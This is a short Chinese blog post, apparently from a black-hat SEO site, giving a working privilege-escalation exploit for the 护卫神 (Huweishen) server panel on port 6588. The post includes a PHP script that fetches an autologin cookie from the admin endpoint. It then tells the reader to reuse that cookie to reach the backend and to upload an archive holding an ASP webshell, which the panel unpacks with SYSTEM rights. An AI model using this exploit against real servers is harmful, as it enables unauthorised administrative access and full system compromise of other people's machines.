护卫神6588端口提权漏洞 - 黑帽SEO

护卫神6588端口提权漏洞

  • 内容
  • 相关
shell权限

可执行脚本

<?php
function httpGet() {
    $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?>
上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

本文标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为《tougaohao》原创,转载请保留文章出处。

本文链接:护卫神6588端口提权漏洞 - http://www.weixingseo.com/post-162.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注